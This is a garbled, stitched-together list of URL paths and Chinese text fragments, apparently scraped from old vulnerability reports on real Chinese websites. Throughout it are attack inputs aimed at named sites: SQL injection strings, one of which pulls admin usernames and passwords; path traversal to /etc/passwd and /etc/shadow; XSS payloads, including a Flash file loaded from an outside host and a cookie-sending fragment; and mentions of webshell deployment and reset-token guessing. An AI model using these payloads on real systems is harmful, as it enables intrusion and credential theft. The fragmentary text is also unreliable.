/music/qzone/qzone_tv_player.swf?a= qzs.qq.com swf /qzone/client/photo/swf/CustomSlideShow.swf?bg=外部图片或FLASH /qzone/client/photo/swf/CustomSlideShow.swf?a=}&bg=http://xsst.sinaapp.com/Xss.swf /Xss.swf又触发了对src属性的判断规则。 /qzone/client/photo/swf/CustomSlideShow.swf?a=}&bg=http://xsst.sinaapp.com/Xss.swf /member/reg/chnreg.shtml / /ckfinder/ckfinder.html /shuodao/open.php?_a=show_more&type=ht_1 /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /indexaction!login.action / /?spm=a1z10.1.0.36.RJcKkF /login.htm /usermedia/changestate.php?unqid={81B498D6-9071-4E8E-9853-394CBDED0004}&state=3 /root/login.aspx /netbroker/weblogon.action /netbroker/weblogon.action /netbroker/weblogon.action /cgi-bin/php-cgi/html/svpn.php /bugs/wooyun-2010-017323 /upload/ /Images/ /downLoad?fileName=201206191739000041.doc /ids/cn/haier_login.jsp?returnUrl=http://user.haier.com/cn/ /ids/cn/forget_password_mobile.jsp /2012/kongtiao/works.php?works=81 /qzone/app/blog/v6/script/content_templateblog_parser.js block /qzone/space_item/orig/3/87731/module_1.jpg /31303066.mp3| / /helpcenter/xinDownload.do?method=BuzList&t /helpcenter/xinDownload.do?method=BuzList&t /wtt/freeCall800.jsp?account=wtt_2219&extension=32219 /webcall/agi800qyb.php?account=wtt_2219&hotline=400-678-9292&extension=32219&cb_num=电话号码&site=&sourceip=你的ip xsser.me/W6XZPx?1353073324'// /index.php?action=kb&article=2&op=comment /index.php?action=kb&article=22&op=comment /modules/ /modules/KB/admin/article_attach.php /modules/KB/file_d.php?id=xxx /event/haiyou_changbaofang.aspx随便找一个点击"我要预订 /event/SendEmail_byChangBaoFang.aspx?email=machun@htinns.com&hotelid=1022181&roomtype=高低铺 /,无意中点开一看,发现竟然是新浪SAE应用审核平台! /meeting/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /meeting/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D / /userinfo.aspx /brand.aspx /shuma/13072863144713x.shtml /meirong/13058326800136x.shtml center /img.jpg#"><img none 466px;height:700px center /psb?/01d1295e-6c2f-4efd-825e-e15c2a77c787/mPEZeaUmy4PfIqxb9UclFShCdxmBJup1fOa6uKTgL80!/b/dJyTa5cOCQAA&bo=0gG8AgAAAAABAEo!#"><img none 466px;height:700px /qzone/app/blog/v6/script/blog_content.js void(0) /qzone/newblog/v5/script/common.js /dwr/index.html /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 //search.do?keywords=1 /search.do?keywords=1%3E%3Cscript/src=%22%3C/script%3Ealert%281%29//%22% //search.do?keywords=1 /WEB-INF/web.xml /vhost/vhostAction.do?method=showVhostPage&gcode=60512206765937 /books/index.php?op=modify&back=&book_id=53 //main/admin/css/.svn/entries //.bash_history /info.php /index.php?controller=ucenter&action=order_detail&id=22051 /index.php?controller=ucenter&action=order_detail&id=25907 /zzzsk/zszshh.aspx?id=16858 /autogetarticle/_GetLockPic.php?p=/etc/passwd /autogetarticle/_GetLockPic.php?p=/data/htdocs/www.donews.com/liv_global.php /autogetarticle/_GetLockPic.php?p=/data/htdocs/www.donews.com/liv_libraries/config.php /register.jsp /system/userinfoRegisterAction.action?dom.userpassword&dom.linkemail=dnion@163.com&dom.usercode=dnions /system/userinfoRegisterAction.action?dom.userpassword&dom.linkemail=dnion@163.com&dom.usercode=dnions / / /admin/login.php /download2.php?url=c:\windows\win.ini /xtaskdesc.php?act=jianyi&id=-1 /,用的是ECshop的系统,未及时打上补丁。可以用 / / /Aspx/ManageApp/Blank.aspx这个页面上,但是用burp /account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&productType=D&type=N%27/**/union/**/select/**/user%28%29,null,null,null,null,null,null,null,null,null,null%23 /account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&type=N&productType=D%27 /account/transaction.do?method=list&jyType=&page=&pageNum=&endDate=%27 /account/invoice.do?method=listOpened&endDate=&money=&startDate=&title=%27%20or%20%27%27=%27 /vhost/manager.do?method=listRenewAndUpgrade&beginDate=&domain=&endDate=%27%20and%201=1%20and%20%27%27=%27 /domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%27 /domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%20order%20by%208%23 /domain/domainAuditManage.do?domainName=&from=search&from=search&method=showAllDomainList&domainTypeSearch=%27%20union%20select%201,user%28%29,null,null,null,null,null,null,null%23 /listnews.asp?nid=632 /login.asp /web/Index.action /News_showNews.action?messagekey=54286 /?appid=330051%27%20and%20sleep%282%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /?appid=330051%27%20and%20sleep%281%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /?appid=330051%27%20and%20sleep%280%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /interface/recommend/follow.jsp?act=addfollow&userid=xxxx /api/tw?method=tweet.ice.share&_v=1363755146092¶ms.appId=twitter¶ms.title=¶ms.sourceName=Goodjob!¶ms.type=2¶ms.sourceLink=¶ms.sharedId=xxx¶ms.sharedUserId=xxx /4s8Xf0。 /member/compositionupload.jspx?topicId=40&compositionid=90 //ProductSearch/productsearch2.asp?PackageName=1%27%22&page=2&v_BizID=1717&v_UserLevel=1 / /Auditing/download.jsp?filename=../../Auditing/download.jsp /admin/download.jsp?path=/admin/download.jsp /util/downFile.jsp?fileName=../util/downFile.jsp /jsp/download.jsp?filename=../../../jsp/download.jsp /download.jsp?downadd=../../download.jsp /ghc/editor/down.jsp?path=../../&file=ghc/editor/down.jsp /Admin/Article/FileLoad.aspx?FileName=1.aspx&URL=../../../Admin/Article/FileLoad.aspx /representNew/down.jsp?path=../representNew/down.jsp /lm/down.jsp?name=&path=../../lm/down.jsp /ahpcmanage/front/info/information_download.jsp?FileName=../../../ahpcmanage/front/info/information_download.jsp /marry/set_index.php?page=398&action=messageboardlist&userid=118 /rssFeed.php?id=1105 /my_charge_history.xhtml /Help/AboutUs/Introduce.aspx /Shop/List.aspx?Keyword=22 windows /4.asp /comment/admin/login.php /此应用缺陷修改他人信息! /query/server2.asp /hotel/hotel.action?orderNo=&language=zh%5fCN&cssNo=3%5f2&arrivalDate=2013%2d03%2d20&departureDate=2013%2d03%2d21&btnSearch=%67e5%8be2&city=HAS&hotel=AHAA&adult=1&children=0&room=1 /infotable.aspx?topic=%cd%a8%d6%aa%b9%ab%b8%e6 /infoview.aspx?infoid=89 /infoview.aspx?infoid=89 /a.zip /car/ /follow/addfollows /following?cur=1&gid=0 /user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01&uid=1521422610 /user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01http://url.cn/DTqtgI&uid=1521422610 /Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9 /introduct.php?id=2 /manager/admin_login.aspx /Customer_Service/CustomerTopicList.aspx /s?wd=%E5%BE%AE%E5%8D%9A%3Cimg+src%3D1+onerror%3Dalert%281%29%3E /s?wd=搜索 /s?wd=搜索 /redirect.php?u=Mjg2MzI3MDE4&return_url=http://dellcqg.renren.com/thanksgiving/ /v_show/id_XNTA5ODEyODQw.html /?origin=50115 /user/modify_password&code=320161&id=196772 /ConInfoParticular.jsp?id=14731 /vecenter/guopeichaxun.aspx /searchdir/RentSearch.aspx?ddlisask=1&ddlispartner=0/user /searchdir/RentSearch.aspx?ddlisask=1&ddlispartner=0/@@version /phpcms/index.php?db-5/gid-xd.html www.linux520.com里面去 Object /Xss.swf,提交数据, /lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr fks_087065080081084067086083081071072087083074083095081070093 number:12979759 ddd i_majia number:12979759 lli.vip %E6%9D%8E%E9%BB%8E true reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12 false 12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0 /PlusMinusOneAdmin/look/lookalldd.php?id=1&page=1 /PlusMinusOneAdmin/look/lookuserinfo.php?id=2 /PlusMinusOneManger/ /p/tecshuttle/source/detail?r=62 /include/dialog/select_soft_post.php /plus/mytag_js.php?aid=999 /phpsso_server/?m=admin&c=login&a=init&forward= /phpsso_server/?m=admin&c=login&a=init&forward= /phpsso_server/api.php?op=checkcode&code_len=4&font_size=14&width=84&height=24&font=&font_color=&background= /admin/index.jsp /euair/index.jsp /finance/fundhtml/download.php?id=498425426 /record.php www.net.cn使用dedecms集合之前dede所爆漏洞可以得到管理员的帐号与密码 www.net.cn后台 www.net.cn www.net.cn /userInfoAction!goLoginPage.action /userInfoAction!goLoginPage.action /userInfoAction!goLoginPage.action /AODList.jsp /yao/index.php?m=zbzb&a=rcontent&id=145&type=1 /vip/login.php?m=login&a=login /yao/index.php?m=zbzb&a=rcontent&id=145&type=1 /plan.php?typename=city&cityid=48 www.shopexdrp.cn/plus/search.php?keyword=as&typeArr[111%3D@`\ /,title是MCDM移动设备管理系统 /jmx-console/,可以看到部署的war;其中已经删除了status,看来还是有一点加固的 /shop_admin/forgot.php / /module/membercenter/membermyorderdetails.jsp?id= /module/membercenter/membermyorderdetails.jsp?id=45808 /module/membercenter/membermyorderupdate.jsp?method=cancle&orderid= /module/membercenter/membermyorderdetails.jsp?id=45830 /module/membercenter/membermyorderupdate.jsp?method=cancle&orderid=45830 /bbs/chuishui/304014777,3.html#51 /stat.aspx /stat.aspx?channelid=00000006-0000-0000-3230-303631323134&date=2013-03-23 /plus/search.php?keyword=as&typeArr[111%3D@`\ / /?action=read&forumid=mom_daugh&threadid=1cgwdnckddv /iForgot/iForgot.html,填写指定的apple /voiceofchina/log_sms_callback.txt /XXXXXX none function(XMLHttpRequest){},success:function(rs) /yao/index.php?m=yyzhaos&a=index&tagid=29 http://data.auto.sina.com.cn/dealer/interface/weiboadv.php?subid= /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/js/musicblog_player.js这个文件中的initSwfData()函数。从图中不难看出,setSwfSongList的参数数据来自于 /music/photo/singer/ /qzone/newblog/v5/script/common.js /music/photo/singer/ /music/photo/singer/NaN/singerpic_96/../../../../../1.swf&a=_0.jpg /1.swf?a=_0.jpg /qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf /qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /music/musicbox_v2_1/img/MusicFlash.swf /13130617.wma|雨人|96/../../../../../qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf?facadeId= function() /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/img/MusicFlash.swf /question/vote_start.php?s_id=39 /media_file001/1103/dongshi/Excellent/005/wg/upload/upfile.asp / /notices/86%20and%201=1 /notices/show/91%20and%201=1 /users/login?redirect_url=http://www.taobaotest.com/jobs/79%df%27 /users/password_reset?username=xxxx%df%27 /tags/jhgvjh;%27%df%27/blogs /pictures/avatars/1083.html /login/Jeecms.do www.huatu.com /payment/log_sms_callback.txt /payment/log_card_callback.txt /main.aspx / / /z12345G /save.php?cookie='+encodeURIComponent(JSON.stringify(cookie_dict)) / /Product.aspx?id=760 /jmx-console/,上传war的位置 xsst.sinaapp.com/Xss.swf /Xss.swf xsst.sinaapp.com/Xss.swf /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm,If((1=2),1,(select%20user%20from%20mysql.user))%20desc%23&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm,If((1=1),1,(select%20user%20from%20mysql.user))%20desc%23&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=,If((1=2),1,(select%20user%20from%20mysql.user)) /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=,If((1=1),1,(select%20user%20from%20mysql.user)) /detail/b2b1900e-56e1-43e0-995e-77852ee6794c /download/b2b1900e-56e1-43e0-995e-77852ee6794c / /space/?userid=48574644 /Default.aspx 19.0 /ActvPhone2.EmUser / /hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm?memberId=¤tPage=3&pageSize=15&orderStatusCriteria=&howLong=10 /hotelpay-web/myHotelOrder/cancelHotelOrder.htm?hotelOrderNo=V10011XXX /webrecord/config.php /hwyst/question.php?question_id=120817154748 /cosphoto/index.asp?Page=5 /cosphoto/costp.asp?id=1 /2007wallphoto/nei_costp.asp?id=7 /UpLoadPhoto/Big/20133251532859.gif.aspx /vuldb/ssvid-20949 /plus/ad_js.php?aid=9999 /manage/task 12.0 /manage/task /registerValidate.jhtml?mobile=18682054050&password1=123456&option=mobile //phoenix.zhtml?c=250900&p=irol-calendar //phoenix.zhtml?c=250900&p=./irol-calendar //phoenix.zhtml?c=250900&p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd //phoenix.zhtml?c=250900&p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc //phoenix.zhtml?c=250900&p=data:text/plain,xxxxx ir.vipshop.com//phoenix.zhtml?c=250900&p=data:text/plain,xxxxx%00 /controler/User.ashx?User=admin&action=login&Pass=12345&Autologin=1 / /images/szbg02.gif/c.php /t/follow/create/1893374605 /buy/show.php?id=103&catid=20201003 /storelist.php?catid=2 /phpinfo.php /客户名 /admin /index2.php?user=admin /ajax.php?randhost=uset1364223873400.trace.term.chinacache.com&user=admin /admin/ /admin /admin/ /home/project/hero/admin/ / /Admin/ /admin/ /admin/ /admin/ / /admin/ / /Admin/PostToPTD.aspx /Admin/PostToEBD.aspx / /admin/ / /web2.0/admin/ /bmsweb/ / / /index.php/user/login /admin/login.php /中发现了Fckeditor的test文件 /后面加上了PropTransferTool/DataTransformer.exe.config,然后Enter。。 /bizhi/ /Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /BlogList.aspx?un=sheoa /BlogList.aspx?un=sheoa /BlogList.aspx?un=sheoa /toSendMsg.action?destid={目标用户ID}&subject={发出去对方的msg}&content=1 /new/FocusListOp.action?oppId={目标用户ID}&flag=true /new/WhiteListOp.action?oppId={目标用户ID}&flag=true /discuz/plugin.php?id=v63shop:goods&pac=info&gid= /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+1,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\ /kaifu/1 /data/mysql_error_trace.inc /data/mysql_error_trace.inc /config/config_global.php.bak www.tgbus.com /Login.aspx /Index/tours_news_detail?t_to=30371 /Cruise/cruise_company?id=46 /logo.gif',550,375,{img:this /plus/search.php?keyword=as&typeArr[111%3D@`\ /169_ol/login.php /vote/developer_intro.php?ID=90 /vote/developer_intro.php?ID=236 /vote/developer_intro.php?ID=746 /vote/developer_intro.php?ID=2093 /vote/developer_intro.php?ID=59 /vote/developer_intro.php?ID=1548 /vote/developer_intro.php?ID=827 /vote/developer_intro.php?ID=547 /vote/developer_intro.php?ID=17 /vote/developer_intro.php?ID=1859 /vote/developer_intro.php?ID=768 /vote/developer_intro.php?ID=1494 /vote/developer_intro.php?ID=150029 /vote/developer_intro.php?ID=55 /vote/developer_intro.php?ID=797 /vote/developer_intro.php?ID=111835 /vote/developer_intro.php?ID=687 /vote/developer_intro.php?ID=86 /bizhr/ProjectReport/PlacardInfo.aspx?PlacardID=66 /my/comic/44733 /exam2/ / / / / /,打开一看目测风讯cms, /Member/RetrievePassword.aspx www.lusen.com 19.0 /Member/RetrievePassword.aspx /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /news.asp?id=887 /news.asp?id=131 /jwc/news.asp?id=148 /news.asp?id=406 /news.asp?id=&bh=1389 /news.asp?id=511 /NewsShow.asp?id=381 /news.asp?id=448 /news.asp?id=156 /pinpai_detail.php?id=97 /Member/ModifyMobileValidate.aspx 19.0 /Member/ModifyMobileValidate.aspx shenghuo.alipay.com /reg/reg.aspx注册,直接填写信息是过不了的,有各种限制。直接拿python试试 /Aspx/DevApp/Release_MyApps.aspx?KeyS=产品名 /Aspx/DevApp/Release_Upgrade2.aspx?productid=10000 /Aspx/DevApp/Dev_Message_Info.aspx?mid=100000 /mybaijob/resume/photo/set?photo_id=123456&op=icon /index.action /宽带计费系统的演示站。 /Self/LoginAction.action 19.0 /t3/ /netpayment/BaseHttp.dll?PrePayC1 /PayMerchantReturn.axd 19.0 /Pay.axd?t=3C3F6B94351AC96FAD2623F44C10A590 /member/member_cancelOrder.htm?oid=26677 /jmx-console /jmx-console_lancer/,部署cmd.war /server/javascript/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector,擦,打开了~~ /server/javascript/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F,获取webshell的路径 /server/UserFiles/Image/browser.jsp /soap/admin/,没有详细分析,截个图,一起修复了吧 /resetpwd?sn=MzQyMDQwMg==&userId=A /resetpwd?sn=MzQyMDQwMw==&userId=B /resetpwd?sn=MzQyMDQwNQ==&userId=A /resetpwd?sn=MzQyMDQwNg==&userId=B /resetpwd?sn=MzQyMDQwMg==&userId=A /resetpwd?sn=MzQyMDQwMw==&userId=B /resetpwd?sn=MzQyMDQwNQ==&userId=A /resetpwd?sn=MzQyMDQwNg==&userId=B /resetpwd?sn=MzQyMDQyMg==&userId=账户C /resetpwd?sn=MzQyMDQyM*==&userId=账户C换成账户D,sn最后一位采用人工猜解的方式进行,先从MzQyMDQyMh开始吧 /resetpwd?sn=MzQyMDQyMh==&userId=账户D /resetpwd?sn=MzQyMDQyMi==&userId=账户D /resetpwd?sn=MzQyMDQyMj==&userId=账户D /resetpwd?sn=MzQyMDQyMw==&userId=账户D.W的时候成功了 /appserver/data/developauth/2012-07-19/173back.jpg shenghuo.alipay.com”,googlehacks www1.xx007.cn无关,如: www1.xx007.cn这种网站使用支付宝做在线交易时的某些过程。 /wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91SDK%E4%B8%8B%E8%BD%BD),仅凭一个appid参数即可初始化SSO机制的调用: hc360.com manage /play/169.html / /setnet/reg/login.asp存在注入漏洞。 / /ifree/console/ /student/console_new/ /student/console/student_info_prop.jsp?student_code=0292618 /,站点有个对某个音乐人或作品进行评价回复同时可以同步到自己的sina微博的功能,此处未校验referer导致; /snake/port/snk_song_comment.php /snake/port/snk_artist_sendComment.php /shownews.asp?id=78,随便一个就能暴库了。 /admin/Main.asp /admin/ /cache/spam/safe_tip3.html?http://www.sqlku.com/&d=sc|qq|&t= alert(1) /qq /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector /UserFiles/File/3.jsp / www.whgjj.org.cn/4.asp??page=1&bank=&wd=xxx&dwzh=xxx&xgrzh=811462118&jgrzh=&grzh=811462118&name=a /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /Admin/Error.Asp?msg= 19.0 /user/profile/4ffa6c99e4b0f068ba9e32cf /user/cat?duserId=4ffa6c99e4b0f068ba9e32cf&source=WEIWEN /default.php?m=default&c=shop&a=item&id=70 /user/photo/upload.php /index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=47&url=http%3A%2F%2Fluxury.aili.com%2F2012zt%2Fjewelrydesigner%2F /thread-4388-1-1.html /news/news84 loginfail.htm /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136’ /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /KS_Data/KesionCMS7.mdb /dzwminiweb/common/comment/list/front/Com_list.do www.qq.com /index/?pts=1364491912016 /submit/infopost/?op=close /submit/infopost/?op=close&ids=13374799021446 /netzp/Readdw.asp?dwcis=1简单手工试了一下,发现存在SQL注入 /netzp/Readdw.asp?dwcis=1'and /netzp/Readdw.asp?dwcis=1 /netzp/Readdw.asp?dwcis=1 /netzp/Readdw.asp?dwcis=1 / /a_admin/index.php /gamestore/201303/x.txt /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 www.zhuna.cn 19.0 / /wp/wp-admin/theme-editor.php 19.0 /wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve /wp/wp-admin/theme-editor.php",true /wp.html /RegCompany.aspx注册页面,填写信息! /TsDf24 /home#javascript:alert(1) /tech/3016.html /plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 / www.360shop.com.cn /common/center_db/detail.php?cid=-1%20or%2040%3d38&code=&cpage=1&fc=&from=&hid=&id=201547&mid=&owner=&page=2&tid=34261185&type=2 /common/center_db/list.php?cid=-1%20or%2066%3d64&code=&fc=&from=&hid=&id=201547&mid= /common/center_db/view.php?cid=-1%20or%2083%3d81&code=&cpage=1&fc=&fee=201547&from=&hid=&id=201547&mid=&owner=&tid=34261185&type=2 /plane/jpresult.asp?ddlOrgCity1=PEK%27%20and%201=2%20union%20select%20@@version--&ddlDesCity1=CTU&txtGoDate=2013-04-06 /groupshop/loginNew.action /Operating_315/insert_tab.jsp insert /Operating_315/select_tab.jsp?firstpage=0&lostpage=2 www.556666.com非法站点。 /admin/main.files/com_list.php?id=270 /lpromis /lpromis/ /huawei_ar/sphider/search.php?query= /news_details.php?nid=33 /products.php?cat=2002 /status?full=true /lpromis/MainPage.jsps /bp/manager/ /channel/ /Contact/x.aspx /SOURCE/COMNINFO/fieldlist.aspx?selectindex=1 /SOURCE/COMNINFO/1.aspx /usermedia/viewmedia.php?uid=1 /uploadimage.aspx / utf-8 duapp.com/111.txt duapp.com/111.txt /index.php?do=action&act=setgood&id=3093 /index.php?do=action&act=setgood&id=帖子ID&n=.jpg"/ /logo.gif?',266,266,{img:this www.hao123.com/logo.gif&url=&videoUrl= /business_aliveProduct.action?buyerId=28679‘ java:515 java:419 java:174 /manager/common/modifyPassword.action?type= /letv/data/www/enp/WEB-INF/classes/struts_manager.xml:216:64 java:350 /index.php?nocache=0.7832744262134323 / /editBookMark.php?hs=on&crumb=f80a4c&m=add&favCat=%25B3%25A3%25D3%25C3&favName=%25E4%25B9%258C%25E4%25BA%2591&favUrl=http%253A%252F%252Fwww.wooyun.org%252F / /step2.php这里亲 /pic/date_20130330/1364622479253.php c0deplay /soft/24224.htm brad Reveiw /Login.action /Dealer/default.shtml /Dealer/gys.shtml /status?full=true,http://njfy.gov.cn/web-console/ /app/course.bak?are /setup/phpinfo.php /setup/下给出了明文的数据库账号和密码 /space.php?mod=myalbums&uid=1821326284 /1989894797/blog/1364446931 /FlexApp02C/FlexApp02C-debug/MainFrame.html /DCSS/DCSS-debug/MainFrame.html /phpMyAdmin/index.php?lang=zh-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=e4fdd4d0c0d8951e3fbd2ab3f7c59685 / /docs/funcspecs/2.jsp?sort=1&file=D%3A%5Capp%5CTomcat6%5Cwebapps%5Cjssw%5CWEB-INF%5Cclasses%5CSqlServerJdbc.properties mds.coi.gov.cn可知,其中http://mds.coi.gov.cn/UploadFile/ /网站 /ocean/index.jsp /NetApplyWeb/ / / / /admin888/left.aspx /sch/sch.jsp?vu=64708302265&k=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3C%22&t=2 xsst.sinaapp.com/Xss.swf xsst.sinaapp.com/Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /funshow/2013-03-31/s_13647082964440.jpg#.swf /funshow/2013-03-31/s_13647082964440.jpg#.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /music/musicbox_v2_1/img/MusicFlash.swf /1803680.wma|I /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/img/MusicFlash.swf /tbDetail.htm?currentPage=1&hotFlag=&stCity=%E5%8E%A6%E9%97%A8%E5%B8%82&endCity=%E6%B7%B1%E5%9C%B3%E5%B8%82&stCityId=70790&endCityId=46&pkTimetableId=1046556 /chepiao/querySch.htm?stCityInfo=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582%2C1&carryStaId=-1&busStopId=310000&busStopName=%25E4%25B8%258A%25E6%25B5%25B7&planDate=20130331&timeSta=00%3A00-24%3A00-d /newsDeal.do?method=downloadFile&path=../../../../../../../../../../../../etc/shadow /share/init?shareid=379117&uk=2969867219 /gift/exchange.aspx /fileDown?fname=/index.jsp hflx.whjjjc.org.cn/fileDown?fname=/application/login/loginCheck.jsp /searchTech.php?cd=0&p=2&sidtech=0&so=1%27%22&softId=&ssidtech=0 /searchGameTech.php?gameFrom=gameTech&searchType=tech&so=1%27%22 /wwwAAV.asp?gSKEY= /dpool/robots.txt/x.php /zhuangxiu/rijiku----/%22%3E%3Ciframe%20src=http://www.wooyun.org%20width=500%20height=500%3E%3C/iframe%3E/marquee%3E-.html /mindcity/%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22 /east/MC-lunar/hourly.php?year= /%3CIMG%20SRC=JaVaScRiPt:alert('XSS')%3E / /56mall/?do=Detail&id=NA== www.newman.mobi www.newman.mobi /default.php?m=default&c=shop&a=item&id=xx www.newman.mobi /ajax/Alivv.AjaxRun.WebSiteAjax,Alivv.AjaxRun.ashx?_method=BuyerWebSiteList&_session=r /CXTJ/login.aspx / /webadmin/down/downfile/ /library/ /item.htm?id=19606959454 /frames/login.aspx /schoolwork/selectServer.action /eva/flexui/index.do /jobs/jobs-show.php?id=8758%E2%80%98 plugins/weathermap /bluesword/blue_sword.php?t=t_upload&Action=PostMsg /search.asp?k=x /job_select.asp?id=11 /job_select.asp?id=11 /job_select.asp?id=11 musicbox.php?do= do=musicbox space.php?do=musicbox /index.php?c=follow&a=listen /index.php?id=12975 www.weisec.com讨论技术,转载请注明作者和出处 / /groupBuy/searchorder.do?method=EditOrderStateForCancle&searchOrderState=5&orderid=12878224 /cgi-bin/nw/focus.cgi?id=3 /cgi-bin/player/main.cgi?id=166 /cgi-bin/stat/match.cgi?oid=8322 /cgi-bin/nw/photo/main.cgi?cat=102 /mssd_test/diy/content.php?id=5243 /publish/index.php?NodeID=47&SiteID=1&page=2,存在注入漏洞参数:NodeID /kldpoi.php?do=topic&srchtxt=1&areaid=150000等多个页面均无过滤,导致存在sql注入,sqlmap可轻松拖库。。。 /login.action 